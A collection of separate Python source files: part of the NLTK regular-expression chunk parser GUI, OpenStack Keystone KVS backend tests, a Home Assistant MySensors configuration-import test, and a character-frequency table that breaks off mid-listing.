wordnum = 0
for child in tree:
if isinstance(child, Tree):
if child.node == self._chunk_node:
chunks.add( (wordnum, wordnum+len(child)) )
wordnum += len(child)
else:
wordnum += 1
return chunks
def _syntax_highlight_grammar(self, grammar):
if self.top is None: return
self.grammarbox.tag_remove('comment', '1.0', 'end')
self.grammarbox.tag_remove('angle', '1.0', 'end')
self.grammarbox.tag_remove('brace', '1.0', 'end')
self.grammarbox.tag_add('hangindent', '1.0', 'end')
for lineno, line in enumerate(grammar.split('\n')):
if not line.strip(): continue
m = re.match(r'(\\.|[^#])*(#.*)?', line)
comment_start = None
if m.group(2):
comment_start = m.start(2)
s = '%d.%d' % (lineno+1, m.start(2))
e = '%d.%d' % (lineno+1, m.end(2))
self.grammarbox.tag_add('comment', s, e)
for m in re.finditer('[<>{}]', line):
if comment_start is not None and m.start() >= comment_start:
break
s = '%d.%d' % (lineno+1, m.start())
e = '%d.%d' % (lineno+1, m.end())
if m.group() in '<>':
self.grammarbox.tag_add('angle', s, e)
else:
self.grammarbox.tag_add('brace', s, e)
def _grammarcheck(self, grammar):
if self.top is None: return
self.grammarbox.tag_remove('error', '1.0', 'end')
self._grammarcheck_errs = []
for lineno, line in enumerate(grammar.split('\n')):
line = re.sub(r'((\\.|[^#])*)(#.*)?', r'\1', line)
line = line.strip()
if line:
try: nltk.chunk.regexp.RegexpChunkRule.parse(line)
except ValueError, e:
self.grammarbox.tag_add('error', '%s.0' % (lineno+1),
'%s.0 lineend' % (lineno+1))
self.status['text'] = ''
def update(self, *event):
# Record when update was called (for grammarcheck)
if event:
self._last_keypress = time.time()
# Read the grammar from the Text box.
self.grammar = grammar = self.grammarbox.get('1.0', 'end')
# If the grammar hasn't changed, do nothing:
normalized_grammar = self.normalize_grammar(grammar)
if normalized_grammar == self.normalized_grammar:
return
else:
self.normalized_grammar = normalized_grammar
# If the grammar has changed, and we're looking at history,
# then stop looking at history.
if self._history_index < len(self._history)-1:
self.grammarlabel['text'] = 'Grammar:'
self._syntax_highlight_grammar(grammar)
# The grammar has changed; try parsing it. If it doesn't
# parse, do nothing. (flag error location?)
try:
# Note: the normalized grammar has no blank lines.
if normalized_grammar:
rules = [nltk.chunk.regexp.RegexpChunkRule.parse(line)
for line in normalized_grammar.split('\n')]
else:
rules = []
except ValueError, e:
# Use the un-normalized grammar for error highlighting.
self._grammarcheck(grammar)
self.chunker = None
return
self.chunker = nltk.chunk.RegexpChunkParser(rules)
self.grammarbox.tag_remove('error', '1.0', 'end')
self.grammar_changed = time.time()
# Display the results
if self._showing_trace:
self.show_trace()
else:
self._highlight_devset()
# Start the eval demon
if not self._eval_demon_running:
self._eval_demon()
def _highlight_devset(self, sample=None):
if sample is None:
sample = self.devset[self.devset_index:self.devset_index+1]
self.devsetbox.tag_remove('true-pos', '1.0', 'end')
self.devsetbox.tag_remove('false-neg', '1.0', 'end')
self.devsetbox.tag_remove('false-pos', '1.0', 'end')
# Run the grammar on the test cases.
for sentnum, gold_tree in enumerate(sample):
# Run the chunk parser
test_tree = self._chunkparse(gold_tree.leaves())
# Extract gold & test chunks
gold_chunks = self._chunks(gold_tree)
test_chunks = self._chunks(test_tree)
# Compare them.
for chunk in gold_chunks.intersection(test_chunks):
self._color_chunk(sentnum, chunk, 'true-pos')
for chunk in gold_chunks - test_chunks:
self._color_chunk(sentnum, chunk, 'false-neg')
for chunk in test_chunks - gold_chunks:
self._color_chunk(sentnum, chunk, 'false-pos')
def _chunkparse(self, words):
try:
return self.chunker.parse(words)
except (ValueError, IndexError), e:
# There's an error somewhere in the grammar, but we're not sure
# exactly where, so just mark the whole grammar as bad.
# E.g., this is caused by: "({<NN>})"
self.grammarbox.tag_add('error', '1.0', 'end')
# Treat it as tagging nothing:
return words
def _color_chunk(self, sentnum, chunk, tag):
start, end = chunk
self.devsetbox.tag_add(tag,
'%s.%s' % (self.linenum[sentnum], self.charnum[sentnum, start]),
'%s.%s' % (self.linenum[sentnum], self.charnum[sentnum, end]-1))
def reset(self):
# Clear various variables
self.chunker = None
self.grammar = None
self.normalized_grammar = None
self.grammar_changed = 0
self._history = []
self._history_index = 0
# Update the on-screen display.
self.grammarbox.delete('1.0', 'end')
self.show_devset(0)
self.update()
#self._eval_plot()
SAVE_GRAMMAR_TEMPLATE = (
'# Regexp Chunk Parsing Grammar\n'
'# Saved %(date)s\n'
'#\n'
'# Development set: %(devset)s\n'
'# Precision: %(precision)s\n'
'# Recall: %(recall)s\n'
'# F-score: %(fscore)s\n\n'
'%(grammar)s\n')
def save_grammar(self, filename=None):
if not filename:
ftypes = [('Chunk Gramamr', '.chunk'),
('All files', '*')]
filename = tkFileDialog.asksaveasfilename(filetypes=ftypes,
defaultextension='.chunk')
if not filename: return
if (self._history and self.normalized_grammar ==
self.normalize_grammar(self._history[-1][0])):
precision, recall, fscore = ['%.2f%%' % (100*v) for v in
self._history[-1][1:]]
elif self.chunker is None:
precision = recall = fscore = 'Grammar not well formed'
else:
precision = recall = fscore = 'Not finished evaluation yet'
out = open(filename, 'w')
out.write(self.SAVE_GRAMMAR_TEMPLATE % dict(
date=time.ctime(), devset=self.devset_name,
precision=precision, recall=recall, fscore=fscore,
grammar=self.grammar.strip()))
out.close()
def load_grammar(self, filename=None):
if not filename:
ftypes = [('Chunk Gramamr', '.chunk'),
('All files', '*')]
filename = tkFileDialog.askopenfilename(filetypes=ftypes,
defaultextension='.chunk')
if not filename: return
self.grammarbox.delete('1.0', 'end')
self.update()
grammar = open(filename).read()
grammar = re.sub('^\# Regexp Chunk Parsing Grammar[\s\S]*'
'F-score:.*\n', '', grammar).lstrip()
self.grammarbox.insert('1.0', grammar)
self.update()
def save_history(self, filename=None):
if not filename:
ftypes = [('Chunk Gramamr History', '.txt'),
('All files', '*')]
filename = tkFileDialog.asksaveasfilename(filetypes=ftypes,
defaultextension='.txt')
if not filename: return
out = open(filename, 'w')
out.write('# Regexp Chunk Parsing Grammar History\n')
out.write('# Saved %s\n' % time.ctime())
out.write('# Development set: %s\n' % self.devset_name)
for i, (g, p, r, f) in enumerate(self._history):
hdr = ('Grammar %d/%d (precision=%.2f%%, recall=%.2f%%, '
'fscore=%.2f%%)' % (i+1, len(self._history),
p*100, r*100, f*100))
out.write('\n%s\n' % hdr)
out.write(''.join(' %s\n' % line for line in g.strip().split()))
if not (self._history and self.normalized_grammar ==
self.normalize_grammar(self._history[-1][0])):
if self.chunker is None:
out.write('\nCurrent Grammar (not well-formed)\n')
else:
out.write('\nCurrent Grammar (not evaluated)\n')
out.write(''.join(' %s\n' % line for line
in self.grammar.strip().split()))
out.close()
def about(self, *e):
ABOUT = ("NLTK RegExp Chunk Parser Application\n"+
"Written by Edward Loper")
TITLE = 'About: Regular Expression Chunk Parser Application'
try:
from tkMessageBox import Message
Message(message=ABOUT, title=TITLE).show()
except:
ShowText(self.top, TITLE, ABOUT)
def set_devset_size(self, size=None):
if size is not None: self._devset_size.set(size)
self._devset_size.set(min(len(self.devset), self._devset_size.get()))
self.show_devset(1)
self.show_devset(0)
# what about history? Evaluated at diff dev set sizes!
def resize(self, size=None):
if size is not None: self._size.set(size)
size = self._size.get()
self._font.configure(size=-(abs(size)))
self._smallfont.configure(size=min(-10, -(abs(size))*14/20))
def mainloop(self, *args, **kwargs):
"""
Enter the Tkinter mainloop. This function must be called if
this demo is created from a non-interactive program (e.g.
from a secript); otherwise, the demo will close as soon as
the script completes.
"""
if in_idle(): return
self.top.mainloop(*args, **kwargs)
def app():
RegexpChunkApp().mainloop()
if __name__ == '__main__':
app()
__all__ = ['app']
| |
# Copyright 2012 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import datetime
import uuid
from oslo.utils import timeutils
import six
from testtools import matchers
from keystone import config
from keystone import exception
from keystone import tests
from keystone.tests import default_fixtures
from keystone.tests.ksfixtures import database
from keystone.tests import test_backend
CONF = config.CONF
class KvsIdentity(tests.TestCase, test_backend.IdentityTests):
def setUp(self):
# NOTE(dstanek): setup the database for subsystems that only have a
# SQL backend (like credentials)
self.useFixture(database.Database())
super(KvsIdentity, self).setUp()
self.load_backends()
self.load_fixtures(default_fixtures)
def config_overrides(self):
super(KvsIdentity, self).config_overrides()
self.config_fixture.config(
group='identity',
driver='keystone.identity.backends.kvs.Identity')
def test_password_hashed(self):
driver = self.identity_api._select_identity_driver(
self.user_foo['domain_id'])
user_ref = driver._get_user(self.user_foo['id'])
self.assertNotEqual(user_ref['password'], self.user_foo['password'])
def test_list_projects_for_user_with_grants(self):
self.skipTest('kvs backend is now deprecated')
def test_create_duplicate_group_name_in_different_domains(self):
self.skipTest('Blocked by bug 1119770')
def test_create_duplicate_user_name_in_different_domains(self):
self.skipTest('Blocked by bug 1119770')
def test_create_duplicate_project_name_in_different_domains(self):
self.skipTest('Blocked by bug 1119770')
def test_move_user_between_domains(self):
self.skipTest('Blocked by bug 1119770')
def test_move_user_between_domains_with_clashing_names_fails(self):
self.skipTest('Blocked by bug 1119770')
def test_move_group_between_domains(self):
self.skipTest('Blocked by bug 1119770')
def test_move_group_between_domains_with_clashing_names_fails(self):
self.skipTest('Blocked by bug 1119770')
def test_move_project_between_domains(self):
self.skipTest('Blocked by bug 1119770')
def test_move_project_between_domains_with_clashing_names_fails(self):
self.skipTest('Blocked by bug 1119770')
def test_delete_group_removes_role_assignments(self):
# When a group is deleted any role assignments for the group are
# supposed to be removed, but the KVS backend doesn't implement the
# funcationality so the assignments are left around.
DEFAULT_DOMAIN_ID = CONF.identity.default_domain_id
MEMBER_ROLE_ID = 'member'
def get_member_assignments():
assignments = self.assignment_api.list_role_assignments()
return filter(lambda x: x['role_id'] == MEMBER_ROLE_ID,
assignments)
# Create a group.
new_group = {
'domain_id': DEFAULT_DOMAIN_ID,
'name': self.getUniqueString(prefix='tdgrra')}
new_group = self.identity_api.create_group(new_group)
# Create a project.
new_project = {
'id': uuid.uuid4().hex,
'name': self.getUniqueString(prefix='tdgrra'),
'domain_id': DEFAULT_DOMAIN_ID}
self.assignment_api.create_project(new_project['id'], new_project)
# Assign a role to the group.
self.assignment_api.create_grant(
group_id=new_group['id'], project_id=new_project['id'],
role_id=MEMBER_ROLE_ID)
new_role_assignments = get_member_assignments()
# Delete the group.
self.identity_api.delete_group(new_group['id'])
# Check that the role assignment for the group is still there since
# kvs doesn't implement cleanup.
member_assignments = get_member_assignments()
self.assertThat(member_assignments,
matchers.Equals(new_role_assignments))
def test_list_role_assignments_filtered_by_inherited(self):
self.skipTest('Blocked by bug 1360406')
def test_list_role_assignments_combined_filters(self):
self.skipTest('Blocked by bug 1360406')
def test_inherited_grant_for_user_on_project_crud(self):
self.skipTest('Blocked by bug 1360406')
def test_inherited_grant_for_group_on_project_crud(self):
self.skipTest('Blocked by bug 1360406')
class KvsToken(tests.TestCase, test_backend.TokenTests):
def setUp(self):
super(KvsToken, self).setUp()
self.load_backends()
def config_overrides(self):
super(KvsToken, self).config_overrides()
self.config_fixture.config(
group='identity',
driver='keystone.identity.backends.kvs.Identity')
def test_flush_expired_token(self):
self.assertRaises(
exception.NotImplemented,
self.token_provider_api._persistence.flush_expired_tokens)
def _update_user_token_index_direct(self, user_key, token_id, new_data):
persistence = self.token_provider_api._persistence
token_list = persistence.driver._get_user_token_list_with_expiry(
user_key)
# Update the user-index so that the expires time is _actually_ expired
# since we do not do an explicit get on the token, we only reference
# the data in the user index (to save extra round-trips to the kvs
# backend).
for i, data in enumerate(token_list):
if data[0] == token_id:
token_list[i] = new_data
break
self.token_provider_api._persistence.driver._store.set(user_key,
token_list)
def test_cleanup_user_index_on_create(self):
user_id = six.text_type(uuid.uuid4().hex)
valid_token_id, data = self.create_token_sample_data(user_id=user_id)
expired_token_id, expired_data = self.create_token_sample_data(
user_id=user_id)
expire_delta = datetime.timedelta(seconds=86400)
# NOTE(morganfainberg): Directly access the data cache since we need to
# get expired tokens as well as valid tokens.
token_persistence = self.token_provider_api._persistence
user_key = token_persistence.driver._prefix_user_id(user_id)
user_token_list = token_persistence.driver._store.get(user_key)
valid_token_ref = token_persistence.get_token(valid_token_id)
expired_token_ref = token_persistence.get_token(expired_token_id)
expected_user_token_list = [
(valid_token_id, timeutils.isotime(valid_token_ref['expires'],
subsecond=True)),
(expired_token_id, timeutils.isotime(expired_token_ref['expires'],
subsecond=True))]
self.assertEqual(expected_user_token_list, user_token_list)
new_expired_data = (expired_token_id,
timeutils.isotime(
(timeutils.utcnow() - expire_delta),
subsecond=True))
self._update_user_token_index_direct(user_key, expired_token_id,
new_expired_data)
valid_token_id_2, valid_data_2 = self.create_token_sample_data(
user_id=user_id)
valid_token_ref_2 = token_persistence.get_token(valid_token_id_2)
expected_user_token_list = [
(valid_token_id, timeutils.isotime(valid_token_ref['expires'],
subsecond=True)),
(valid_token_id_2, timeutils.isotime(valid_token_ref_2['expires'],
subsecond=True))]
user_token_list = token_persistence.driver._store.get(user_key)
self.assertEqual(expected_user_token_list, user_token_list)
# Test that revoked tokens are removed from the list on create.
token_persistence.delete_token(valid_token_id_2)
new_token_id, data = self.create_token_sample_data(user_id=user_id)
new_token_ref = token_persistence.get_token(new_token_id)
expected_user_token_list = [
(valid_token_id, timeutils.isotime(valid_token_ref['expires'],
subsecond=True)),
(new_token_id, timeutils.isotime(new_token_ref['expires'],
subsecond=True))]
user_token_list = token_persistence.driver._store.get(user_key)
self.assertEqual(expected_user_token_list, user_token_list)
class KvsTrust(tests.TestCase, test_backend.TrustTests):
def setUp(self):
super(KvsTrust, self).setUp()
self.load_backends()
self.load_fixtures(default_fixtures)
def config_overrides(self):
super(KvsTrust, self).config_overrides()
self.config_fixture.config(
group='identity',
driver='keystone.identity.backends.kvs.Identity')
self.config_fixture.config(
group='trust',
driver='keystone.trust.backends.kvs.Trust')
self.config_fixture.config(
group='catalog',
driver='keystone.catalog.backends.kvs.Catalog')
class KvsCatalog(tests.TestCase, test_backend.CatalogTests):
def setUp(self):
super(KvsCatalog, self).setUp()
self.load_backends()
self._load_fake_catalog()
def config_overrides(self):
super(KvsCatalog, self).config_overrides()
self.config_fixture.config(
group='identity',
driver='keystone.identity.backends.kvs.Identity')
self.config_fixture.config(
group='trust',
driver='keystone.trust.backends.kvs.Trust')
self.config_fixture.config(
group='catalog',
driver='keystone.catalog.backends.kvs.Catalog')
def _load_fake_catalog(self):
self.catalog_foobar = self.catalog_api.driver._create_catalog(
'foo', 'bar',
{'RegionFoo': {'service_bar': {'foo': 'bar'}}})
def test_get_catalog_404(self):
# FIXME(dolph): this test should be moved up to test_backend
# FIXME(dolph): exceptions should be UserNotFound and ProjectNotFound
self.assertRaises(exception.NotFound,
self.catalog_api.get_catalog,
uuid.uuid4().hex,
'bar')
self.assertRaises(exception.NotFound,
self.catalog_api.get_catalog,
'foo',
uuid.uuid4().hex)
def test_get_catalog(self):
catalog_ref = self.catalog_api.get_catalog('foo', 'bar')
self.assertDictEqual(catalog_ref, self.catalog_foobar)
def test_get_catalog_endpoint_disabled(self):
# This test doesn't apply to KVS because with the KVS backend the
# application creates the catalog (including the endpoints) for each
# user and project. Whether endpoints are enabled or disabled isn't
# a consideration.
f = super(KvsCatalog, self).test_get_catalog_endpoint_disabled
self.assertRaises(exception.NotFound, f)
def test_get_v3_catalog_endpoint_disabled(self):
# There's no need to have disabled endpoints in the kvs catalog. Those
# endpoints should just be removed from the store. This just tests
# what happens currently when the super impl is called.
f = super(KvsCatalog, self).test_get_v3_catalog_endpoint_disabled
self.assertRaises(exception.NotFound, f)
def test_list_regions_filtered_by_parent_region_id(self):
self.skipTest('KVS backend does not support hints')
def test_service_filtering(self):
self.skipTest("kvs backend doesn't support filtering")
class KvsTokenCacheInvalidation(tests.TestCase,
test_backend.TokenCacheInvalidation):
def setUp(self):
super(KvsTokenCacheInvalidation, self).setUp()
self.load_backends()
self._create_test_data()
def config_overrides(self):
super(KvsTokenCacheInvalidation, self).config_overrides()
self.config_fixture.config(
group='identity',
driver='keystone.identity.backends.kvs.Identity')
self.config_fixture.config(
group='token',
driver='keystone.token.backends.kvs.Token')
class KvsInheritanceTests(tests.TestCase, test_backend.InheritanceTests):
def setUp(self):
# NOTE(dstanek): setup the database for subsystems that only have a
# SQL backend (like credentials)
self.useFixture(database.Database())
super(KvsInheritanceTests, self).setUp()
self.load_backends()
self.load_fixtures(default_fixtures)
def config_overrides(self):
super(KvsInheritanceTests, self).config_overrides()
self.config_fixture.config(
group='identity',
driver='keystone.identity.backends.kvs.Identity')
self.config_fixture.config(
group='assignment',
driver='keystone.assignment.backends.kvs.Assignment')
| |
"""Test function in __init__.py."""
from typing import Dict
from unittest.mock import patch
import pytest
from homeassistant.components.mysensors import (
CONF_BAUD_RATE,
CONF_DEVICE,
CONF_GATEWAYS,
CONF_PERSISTENCE,
CONF_PERSISTENCE_FILE,
CONF_RETAIN,
CONF_TCP_PORT,
CONF_VERSION,
DEFAULT_VERSION,
DOMAIN,
)
from homeassistant.components.mysensors.const import (
CONF_GATEWAY_TYPE,
CONF_GATEWAY_TYPE_MQTT,
CONF_GATEWAY_TYPE_SERIAL,
CONF_GATEWAY_TYPE_TCP,
CONF_TOPIC_IN_PREFIX,
CONF_TOPIC_OUT_PREFIX,
)
from homeassistant.helpers.typing import ConfigType, HomeAssistantType
from homeassistant.setup import async_setup_component
@pytest.mark.parametrize(
"config, expected_calls, expected_to_succeed, expected_config_flow_user_input",
[
(
{
DOMAIN: {
CONF_GATEWAYS: [
{
CONF_DEVICE: "COM5",
CONF_PERSISTENCE_FILE: "bla.json",
CONF_BAUD_RATE: 57600,
CONF_TCP_PORT: 5003,
}
],
CONF_VERSION: "2.3",
CONF_PERSISTENCE: False,
CONF_RETAIN: True,
}
},
1,
True,
{
CONF_GATEWAY_TYPE: CONF_GATEWAY_TYPE_SERIAL,
CONF_DEVICE: "COM5",
CONF_PERSISTENCE_FILE: "bla.json",
CONF_BAUD_RATE: 57600,
CONF_VERSION: "2.3",
},
),
(
{
DOMAIN: {
CONF_GATEWAYS: [
{
CONF_DEVICE: "127.0.0.1",
CONF_PERSISTENCE_FILE: "blub.pickle",
CONF_BAUD_RATE: 115200,
CONF_TCP_PORT: 343,
}
],
CONF_VERSION: "2.4",
CONF_PERSISTENCE: False,
CONF_RETAIN: False,
}
},
1,
True,
{
CONF_GATEWAY_TYPE: CONF_GATEWAY_TYPE_TCP,
CONF_DEVICE: "127.0.0.1",
CONF_PERSISTENCE_FILE: "blub.pickle",
CONF_TCP_PORT: 343,
CONF_VERSION: "2.4",
},
),
(
{
DOMAIN: {
CONF_GATEWAYS: [
{
CONF_DEVICE: "127.0.0.1",
}
],
CONF_PERSISTENCE: False,
CONF_RETAIN: False,
}
},
1,
True,
{
CONF_GATEWAY_TYPE: CONF_GATEWAY_TYPE_TCP,
CONF_DEVICE: "127.0.0.1",
CONF_TCP_PORT: 5003,
CONF_VERSION: DEFAULT_VERSION,
},
),
(
{
DOMAIN: {
CONF_GATEWAYS: [
{
CONF_DEVICE: "mqtt",
CONF_BAUD_RATE: 115200,
CONF_TCP_PORT: 5003,
CONF_TOPIC_IN_PREFIX: "intopic",
CONF_TOPIC_OUT_PREFIX: "outtopic",
}
],
CONF_PERSISTENCE: False,
CONF_RETAIN: False,
}
},
1,
True,
{
CONF_GATEWAY_TYPE: CONF_GATEWAY_TYPE_MQTT,
CONF_DEVICE: "mqtt",
CONF_VERSION: DEFAULT_VERSION,
CONF_TOPIC_OUT_PREFIX: "outtopic",
CONF_TOPIC_IN_PREFIX: "intopic",
},
),
(
{
DOMAIN: {
CONF_GATEWAYS: [
{
CONF_DEVICE: "mqtt",
CONF_BAUD_RATE: 115200,
CONF_TCP_PORT: 5003,
}
],
CONF_PERSISTENCE: False,
CONF_RETAIN: False,
}
},
0,
True,
{},
),
(
{
DOMAIN: {
CONF_GATEWAYS: [
{
CONF_DEVICE: "mqtt",
CONF_PERSISTENCE_FILE: "bla.json",
CONF_TOPIC_OUT_PREFIX: "out",
CONF_TOPIC_IN_PREFIX: "in",
CONF_BAUD_RATE: 115200,
CONF_TCP_PORT: 5003,
},
{
CONF_DEVICE: "COM6",
CONF_PERSISTENCE_FILE: "bla2.json",
CONF_BAUD_RATE: 115200,
CONF_TCP_PORT: 5003,
},
],
CONF_VERSION: "2.4",
CONF_PERSISTENCE: False,
CONF_RETAIN: False,
}
},
2,
True,
{},
),
(
{
DOMAIN: {
CONF_GATEWAYS: [
{
CONF_DEVICE: "mqtt",
CONF_PERSISTENCE_FILE: "bla.json",
CONF_BAUD_RATE: 115200,
CONF_TCP_PORT: 5003,
},
{
CONF_DEVICE: "COM6",
CONF_PERSISTENCE_FILE: "bla.json",
CONF_BAUD_RATE: 115200,
CONF_TCP_PORT: 5003,
},
],
CONF_VERSION: "2.4",
CONF_PERSISTENCE: False,
CONF_RETAIN: False,
}
},
0,
False,
{},
),
(
{
DOMAIN: {
CONF_GATEWAYS: [
{
CONF_DEVICE: "COMx",
CONF_PERSISTENCE_FILE: "bla.json",
CONF_BAUD_RATE: 115200,
CONF_TCP_PORT: 5003,
},
],
CONF_VERSION: "2.4",
CONF_PERSISTENCE: False,
CONF_RETAIN: False,
}
},
0,
True,
{},
),
],
)
async def test_import(
hass: HomeAssistantType,
config: ConfigType,
expected_calls: int,
expected_to_succeed: bool,
expected_config_flow_user_input: Dict[str, any],
):
"""Test importing a gateway."""
with patch("sys.platform", "win32"), patch(
"homeassistant.components.mysensors.config_flow.try_connect", return_value=True
), patch(
"homeassistant.components.mysensors.async_setup_entry",
return_value=True,
) as mock_setup_entry:
result = await async_setup_component(hass, DOMAIN, config)
assert result == expected_to_succeed
await hass.async_block_till_done()
assert len(mock_setup_entry.mock_calls) == expected_calls
if expected_calls > 0:
config_flow_user_input = mock_setup_entry.mock_calls[0][1][1].data
for key, value in expected_config_flow_user_input.items():
assert key in config_flow_user_input
assert config_flow_user_input[key] == value
| |
TOTAL = 1306336
ONE = {
'0': 1473,
'1': 5936,
'2': 3681,
'3': 2996,
'4': 2480,
'5': 2494,
'6': 1324,
'7': 1474,
'8': 1754,
'9': 1740,
'a': 79714,
'b': 83472,
'c': 78015,
'd': 61702,
'e': 42190,
'f': 68530,
'g': 48942,
'h': 63661,
'i': 34947,
'j': 24312,
'k': 26724,
'l': 66351,
'm': 77245,
'n': 36942,
'o': 40744,
'p': 68978,
'q': 6750,
'r': 49135,
's': 116034,
't': 87440,
'u': 19423,
'v': 22356,
'w': 50718,
'x': 6079,
'y': 13089,
'z': 7491,
}
TWO = {
'0-': 19,
'00': 145,
'01': 143,
'02': 212,
'03': 90,
'04': 61,
'05': 241,
'06': 31,
'07': 151,
'08': 104,
'09': 99,
'0a': 8,
'0b': 8,
'0c': 16,
'0d': 18,
'0e': 8,
'0f': 7,
'0g': 5,
'0h': 4,
'0i': 9,
'0j': 1,
'0k': 4,
'0l': 2,
'0m': 8,
'0n': 10,
'0o': 6,
'0p': 10,
'0r': 10,
'0s': 10,
'0t': 6,
'0u': 5,
'0v': 5,
'0w': 5,
'0x': 4,
'0y': 3,
'0z': 5,
'1-': 177,
'10': 983,
'11': 537,
'12': 767,
'13': 327,
'14': 270,
'15': 257,
'16': 276,
'17': 318,
'18': 505,
'19': 280,
'1a': 61,
'1b': 58,
'1c': 84,
'1d': 52,
'1e': 33,
'1f': 32,
'1g': 38,
'1h': 44,
'1i': 25,
'1j': 13,
'1k': 32,
'1l': 33,
'1m': 59,
'1n': 39,
'1o': 37,
'1p': 68,
'1q': 7,
'1r': 21,
'1s': 336,
'1t': 54,
'1u': 15,
'1v': 14,
'1w': 53,
'1x': 7,
'1y': 14,
'1z': 10,
'2-': 30,
'20': 889,
'21': 406,
'22': 228,
'23': 172,
'24': 480,
'25': 177,
'26': 126,
'27': 96,
'28': 108,
'29': 73,
'2a': 50,
'2b': 94,
'2c': 59,
'2d': 61,
'2e': 29,
'2f': 29,
'2g': 47,
'2h': 24,
'2i': 22,
'2j': 13,
'2k': 27,
'2l': 35,
'2m': 62,
'2n': 53,
'2o': 22,
'2p': 48,
'2q': 7,
'2r': 14,
'2s': 53,
'2t': 43,
'2u': 20,
'2v': 7,
'2w': 43,
'2x': 21,
'2y': 7,
'2z': 6,
'3-': 53,
'30': 292,
'31': 224,
'32': 188,
'33': 179,
'34': 91,
'35': 153,
'36': 367,
'37': 101,
'38': 122,
'39': 118,
'3a': 50,
'3b': 45,
'3c': 37,
'3d': 350,
'3e': 17,
'3f': 26,
'3g': 125,
'3h': 27,
'3i': 11,
'3j': 9,
'3k': 19,
'3l': 25,
'3m': 45,
'3n': 17,
'3o': 15,
'3p': 32,
'3q': 12,
'3r': 72,
'3s': 53,
'3t': 28,
'3u': 3,
'3v': 13,
'3w': 36,
'3x': 17,
'3y': 14,
'3z': 10,
'4-': 76,
'40': 357,
'41': 259,
'42': 170,
'43': 88,
'44': 126,
'45': 102,
'46': 67,
'47': 56,
'48': 97,
'49': 62,
'4a': 41,
'4b': 49,
'4c': 55,
'4d': 53,
'4e': 51,
'4f': 43,
'4g': 52,
'4h': 44,
'4i': 19,
'4j': 13,
'4k': 22,
'4l': 48,
'4m': 62,
'4n': 22,
'4o': 21,
'4p': 60,
'4q': 11,
'4r': 26,
'4s': 94,
'4t': 44,
'4u': 40,
'4v': 17,
'4w': 45,
'4x': 58,
'4y': 24,
'4z': 6,
'5-': 30,
'50': 323,
'51': 574,
'52': 361,
'53': 79,
'54': 155,
'55': 141,
'56': 109,
'57': 66,
'58': 85,
'59': 87,
'5a': 32,
'5b': 17,
'5c': 21,
'5d': 39,
'5e': 7,
'5f': 17,
'5g': 21,
'5h': 10,
'5i': 54,
'5j': 4,
'5k': 16,
'5l': 19,
'5m': 22,
'5n': 8,
'5o': 12,
'5p': 27,
'5q': 4,
'5r': 9,
'5s': 55,
'5t': 38,
'5u': 17,
'5v': 5,
'5w': 5,
'5x': 9,
'5y': 10,
'5z': 6,
'6-': 42,
'60': 173,
'61': 182,
'62': 63,
'63': 56,
'64': 51,
'65': 125,
'66': 134,
'67': 62,
'68': 58,
'69': 105,
'6a': 12,
'6b': 7,
'6c': 11,
'6d': 61,
'6e': 6,
'6f': 15,
'6g': 7,
'6h': 11,
'6i': 6,
'6j': 1,
'6k': 7,
'6l': 8,
'6m': 16,
'6n': 1,
'6o': 5,
'6p': 12,
'6q': 6,
'6r': 15,
'6s': 28,
'6t': 12,
'6u': 2,
'6v': 2,
'6w': 8,
'6x': 5,
'6y': 9,
'7-': 34,
'70': 200,
'71': 205,
'72': 81,
'73': 58,
'74': 53,
'75': 59,
'76': 69,
'77': 191,
'78': 92,
'79': 48,
'7a': 33,
'7b': 18,
'7c': 28,
'7d': 31,
'7e': 13,
'7f': 15,
'7g': 11,
'7h': 15,
'7i': 7,
'7j': 8,
'7k': 16,
'7l': 19,
'7m': 15,
'7n': 5,
'7o': 13,
'7p': 10,
'7q': 2,
'7r': 4,
'7s': 33,
'7t': 37,
'7u': 2,
'7v': 3,
'7w': 13,
'7x': 13,
'7y': 12,
'7z': 8,
'8-': 61,
'80': 336,
'81': 180,
'82': 61,
'83': 62,
'84': 99,
'85': 85,
'86': 138,
'87': 85,
'88': 339,
'89': 78,
'8a': 11,
'8b': 16,
'8c': 9,
'8d': 10,
'8e': 6,
'8f': 10,
'8g': 18,
'8h': 7,
'8i': 12,
'8j': 4,
'8k': 6,
'8l': 6,
'8m': 11,
'8n': 2,
'8o': 8,
'8p': 15,
'8q': 7,
'8r': 10,
'8s': 18,
'8t': 24,
'8u': 3,
'8v': 2,
'8w': 4,
'8x': 1,
'8y': 6,
'8z': 4,
'9-': 45,
'90': 173,
'91': 275,
'92': 149,
'93': 59,
'94': 76,
'95': 82,
'96': 76,
'97': 123,
'98': 74,
'99': 270,
'9a': 19,
'9b': 9,
'9c': 22,
'9d': 17,
'9e': 10,
'9f': 5,
'9g': 16,
'9h': 6,
'9i': 20,
'9j': 10,
'9k': 9,
'9l': 13,
'9m': 19,
'9n': 8,
'9o': 8,
'9p': 29,
'9q': 3,
'9r': 11,
'9s': 22,
'9t': 26,
'9u': 3,
'9v': 8,
'9w': 11,
'9x': 21,
'9y': 8,
'9z': 5,
'a-': 307,
'a0': 6,
'a1': 172,
'a2': 58,
'a3': 25,
'a4': 16,
'a5': 9,
'a6': 8,
'a7': 20,
'a8': 12,
'a9': 15,
'aa': 778,
'ab': 3124,
'ac': 4416,
'ad': 5316,
'ae': 537,
'af': 1343,
'ag': 4563,
'ah': 760,
'ai': 5617,
'aj': 331,
'ak': 715,
'al': 9102,
'am': 4388,
'an': 8462,
'ao': 351,
'ap': 2155,
'aq': 426,
'ar': 9178,
'as': 6419,
'at': 4007,
'au': 2485,
'av': 1218,
'aw': 1869,
'ax': 403,
'ay': 457,
'az': 646,
'b-': 148,
'b0': 7,
'b1': 19,
'b2': 94,
'b3': 12,
'b4': 24,
'b5': 9,
'b6': 4,
'b7': 5,
'b8': 2,
'b9': 6,
'ba': 15356,
'bb': 477,
'bc': 323,
'bd': 266,
'be': 14064,
'bf': 200,
'bg': 189,
'bh': 311,
'bi': 11911,
'bj': 604,
'bk': 178,
'bl': 5297,
'bm': 306,
'bn': 218,
'bo': 11986,
'bp': 229,
'bq': 103,
'br': 5001,
'bs': 317,
'bt': 266,
'bu': 12643,
'bv': 126,
'bw': 147,
'bx': 91,
'by': 2394,
'bz': 139,
'c-': 120,
'c0': 13,
'c1': 21,
'c2': 78,
'c3': 34,
'c4': 30,
'c5': 6,
